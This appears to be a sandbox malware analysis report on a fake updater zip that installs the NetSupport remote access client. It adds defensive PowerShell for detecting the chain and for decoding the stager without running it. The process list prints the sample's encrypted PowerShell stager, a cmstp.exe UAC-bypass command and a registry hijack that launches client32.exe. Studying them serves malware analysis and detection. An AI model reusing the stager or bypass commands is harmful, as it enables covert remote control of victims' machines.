Analysis Overview
SHA256
ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39
Threat Level: Known bad
The file Install Updater (V104.551.2)-stable.zip was found to be: Known bad.
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Enumerates physical storage devices
Kills process with taskkill
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-18 03:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-18 03:25
Reported
2023-07-18 03:30
Platform
win10v2004-20230703-en
Max time kernel
141s
Max time network
206s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\IonicBaseband\\client32.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe | N/A |
Suspicious use of WriteProcessMemory
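The signatures above summarize one chain, visible in the process list below: mshta.exe runs the .hta extracted from the zip and starts powershell.exe with an in-line AES/gzip stager whose output is piped into `powershell -` (stdin); a further `-Encoded` PowerShell stage compiles C# with csc.exe (the beumlt25.0.cs / beumlt25.dll pair is what Add-Type produces), runs cmstp.exe /au on an INF in %TEMP%, registers client32.exe as shell\open\command under CLSID {645FF040-5081-101B-9F08-00AA002F954E} through reg.exe, starts the NetSupport client from %AppData%\IonicBaseband and then kills cmstp.exe. The DllHost instance hosting {3E5FC7F9-9A51-4367-9063-A120244FBEC7} is CMSTPLUA, the auto-elevating COM object the cmstp.exe /au bypass relies on. The script below is an added example, not part of the report: detection logic for that chain, run over constructed process-creation events copied from the process list with the base64 blobs shortened to `...` and the parent links reconstructed from the list order. Get-SampleEvents, Test-NetSupportChain and ConvertFrom-SysmonProcessCreate are names chosen here; the live path assumes Sysmon is installed.

```powershell
# Added example, not part of the sandbox report. Assumed names: Get-SampleEvents,
# Test-NetSupportChain, ConvertFrom-SysmonProcessCreate. Sysmon assumed for live data.

function Test-NetSupportChain {
    param([Parameter(Mandatory)][object[]]$Events)   # objects with Image, CommandLine, ParentImage
    $findings = foreach ($e in $Events) {
        $img = [System.IO.Path]::GetFileName("$($e.Image)").ToLower()
        $par = [System.IO.Path]::GetFileName("$($e.ParentImage)").ToLower()
        $cl  = "$($e.CommandLine)"

        # stager signature: present on both the powershell.exe and the cmd.exe /c command lines
        if ($cl -match 'AesManaged' -and $cl -match 'GzipStream') { "[$img] in-line AES/gzip stager in command line" }

        switch -Regex ($img) {
            '^powershell\.exe$' {
                if ($par -eq 'mshta.exe')                             { "[$img] spawned by mshta.exe" }
                if ($cl -match '\s-enc(oded)?(command)?\s')           { "[$img] encoded command" }
                if ($cl -match '(^|\|)\s*powershell(\.exe)?\s+-\s*$') { "[$img] script fed through 'powershell -' (stdin)" }
            }
            '^cmstp\.exe$' {
                if ($cl -match '/au\s+"?[^"]*\\Temp\\') { "[$img] /au on an INF under %TEMP% (CMSTPLUA auto-elevation pattern)" }
            }
            '^dllhost\.exe$' {
                if ($cl -match '3E5FC7F9-9A51-4367-9063-A120244FBEC7') { "[$img] hosting CMSTPLUA, the elevated COM object the cmstp bypass uses" }
            }
            '^reg\.exe$' {
                if ($cl -match '645FF040-5081-101B-9F08-00AA002F954E.*shell\\open\\command') { "[$img] shell\open\command written under the Recycle Bin CLSID" }
            }
            '^taskkill\.exe$' {
                if ($cl -match '/IM\s+cmstp\.exe') { "[$img] kills cmstp.exe (bypass clean-up)" }
            }
            '^client32\.exe$' {
                if ("$($e.Image)" -match '\\AppData\\Roaming\\') { "[$img] NetSupport client started from %AppData%" }
            }
        }
    }
    return @($findings)
}

function Get-SampleEvents {
    # Constructed from the process list in the report; blobs shortened to '...', parent links assumed from list order.
    $ps  = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
    $cmd = 'C:\Windows\SysWOW64\cmd.exe'
    @(
        [pscustomobject]@{ ParentImage = 'C:\Windows\SysWOW64\mshta.exe'; Image = $ps
            CommandLine = 'powershell.exe -ExecutionPolicy UnRestricted Start-Process cmd.exe -WindowStyle hidden -ArgumentList {/c powershell.exe $u = ...; $w = New-Object System.Security.Cryptography.AesManaged; ... GzipStream ...; $s | powershell - }' }
        [pscustomobject]@{ ParentImage = $ps; Image = $cmd
            CommandLine = 'cmd.exe /c powershell.exe $u = ...; $w = New-Object System.Security.Cryptography.AesManaged; ... GzipStream ...; $s | powershell -' }
        [pscustomobject]@{ ParentImage = $cmd; Image = $ps; CommandLine = 'powershell -' }
        [pscustomobject]@{ ParentImage = $ps; Image = $ps
            CommandLine = 'powershell.exe -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded ...' }
        [pscustomobject]@{ ParentImage = $ps; Image = 'C:\Windows\SysWOW64\cmstp.exe'
            CommandLine = 'cmstp.exe /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"' }
        [pscustomobject]@{ ParentImage = ''; Image = 'C:\Windows\SysWOW64\DllHost.exe'
            CommandLine = 'C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' }
        [pscustomobject]@{ ParentImage = $ps; Image = 'C:\Windows\SysWOW64\reg.exe'
            CommandLine = 'reg.exe Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe' }
        [pscustomobject]@{ ParentImage = $ps; Image = 'C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe'
            CommandLine = 'C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe' }
        [pscustomobject]@{ ParentImage = $ps; Image = 'C:\Windows\SysWOW64\taskkill.exe'; CommandLine = 'taskkill /IM cmstp.exe /F' }
    )
}

function ConvertFrom-SysmonProcessCreate {
    # Maps a Sysmon Event ID 1 record to the shape Test-NetSupportChain expects (needs Sysmon on the host).
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        $d = @{}
        foreach ($x in ([xml]$Record.ToXml()).Event.EventData.Data) { $d[$x.Name] = $x.'#text' }
        [pscustomobject]@{ Image = $d['Image']; CommandLine = $d['CommandLine']; ParentImage = $d['ParentImage'] }
    }
}

# Offline run over the constructed events:
Test-NetSupportChain -Events (Get-SampleEvents)

# Live run (uncomment; requires Sysmon and an elevated shell):
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents 5000 |
#         ConvertFrom-SysmonProcessCreate
# Test-NetSupportChain -Events $live
```

Each rule keys on a single process plus its command line, so the findings are independent of event ordering; correlating them by parent chain or by time window is what turns a pile of hits into one incident, and the constructed set above yields a hit for every stage of the chain.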
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Install Updater (V104.551.2)-stable.zip\Install Updater (V104.551.2)-stable.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell - }
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded 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
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp" "c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP"
C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy unrestricted -WindowStyle hidden -Encoded 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
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
"C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cmstp.exe /F
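The powershell.exe command lines above carry the same stager three times: a base64 blob whose first 16 bytes are loaded as an IV, AES with a 32-byte key (the string ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ= decodes to 32 bytes, so AES-256) in ECB mode, which ignores the IV, so those 16 bytes are simply skipped; zero padding; gzip decompression; and the resulting text piped straight into `powershell -`. The two `-Encoded` invocations are the stage that text launches. The script below is an added example, not the sample's code: it re-implements the decode with the same .NET calls but returns the text and writes it to a file instead of executing it. ConvertFrom-StagerBlob and ConvertTo-StagerBlob are names chosen here; the blob on this page is elided, so the round trip runs on a constructed script, and for a real case you pass the blob captured from the command line.

```powershell
# Added example, not the sample's code: decode the AES/gzip stager from the
# powershell.exe command lines without executing the result.
# Assumed names: ConvertFrom-StagerBlob, ConvertTo-StagerBlob, $demoScript.

function ConvertFrom-StagerBlob {
    param(
        [Parameter(Mandatory)][string]$Blob,     # base64 from the stager; bytes 0..15 are the unused "IV"
        [Parameter(Mandatory)][string]$KeyB64    # base64 key from the stager (32 bytes, AES-256)
    )
    $data = [Convert]::FromBase64String($Blob)
    $key  = [Convert]::FromBase64String($KeyB64)
    if ($key.Length -ne 32) { throw "expected a 32-byte key, got $($key.Length) bytes" }
    if ($data.Length -le 16 -or (($data.Length - 16) % 16) -ne 0) { throw "ciphertext length is not 16 + n*16" }

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::ECB    # ECB uses no IV; the stager's IV assignment is dead code
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aes.Key     = $key
    $dec = $aes.CreateDecryptor()
    try { $plain = $dec.TransformFinalBlock($data, 16, $data.Length - 16) }   # skip the 16 leading bytes, as the stager does
    finally { $dec.Dispose(); $aes.Dispose() }

    # gzip-decompress. PaddingMode.Zeros leaves any zero bytes after the gzip member in place;
    # the original stager relies on GzipStream stopping at the end of the member.
    $in  = New-Object System.IO.MemoryStream (,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GzipStream $in, ([System.IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
    return [System.Text.Encoding]::UTF8.GetString($out.ToArray())
}

function ConvertTo-StagerBlob {
    # Inverse of the above, only here so the example can build a blob offline from constructed input.
    param([Parameter(Mandatory)][string]$Script, [Parameter(Mandatory)][string]$KeyB64)
    $raw = [System.Text.Encoding]::UTF8.GetBytes($Script)
    $ms  = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GzipStream $ms, ([System.IO.Compression.CompressionMode]::Compress)
    $gz.Write($raw, 0, $raw.Length); $gz.Dispose()       # Dispose flushes the gzip trailer
    $gzBytes = $ms.ToArray()

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aes.Key     = [Convert]::FromBase64String($KeyB64)
    $enc = $aes.CreateEncryptor()
    $ct  = $enc.TransformFinalBlock($gzBytes, 0, $gzBytes.Length)
    $enc.Dispose(); $aes.Dispose()
    # 16 zero bytes in front, matching the run of "AAAAAAAAAAAAAAAAAAAAA" that opens the sample's blob
    return [Convert]::ToBase64String([byte[]]((New-Object byte[] 16) + $ct))
}

$keyB64 = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ='   # key string copied from the sample's command line

# Constructed input for the round trip. For a real case use the captured blob instead, e.g.
#   ConvertFrom-StagerBlob -Blob (Get-Content .\blob.txt -Raw).Trim() -KeyB64 $keyB64
$demoScript = 'Write-Host "stage 2 would run here"'
$blob    = ConvertTo-StagerBlob -Script $demoScript -KeyB64 $keyB64
$decoded = ConvertFrom-StagerBlob -Blob $blob -KeyB64 $keyB64
$decoded | Set-Content -LiteralPath (Join-Path $env:TEMP 'stage2.decoded.txt')   # to disk for review, never into "powershell -"
$decoded
```

Run it in Windows PowerShell 5.1, the host the sample itself used (the SysWOW64 powershell.exe), so the GzipStream and padding behaviour match what the stager depended on. The decoded text is the next PowerShell stage; treat it as hostile input and read it, do not pipe it anywhere.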
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
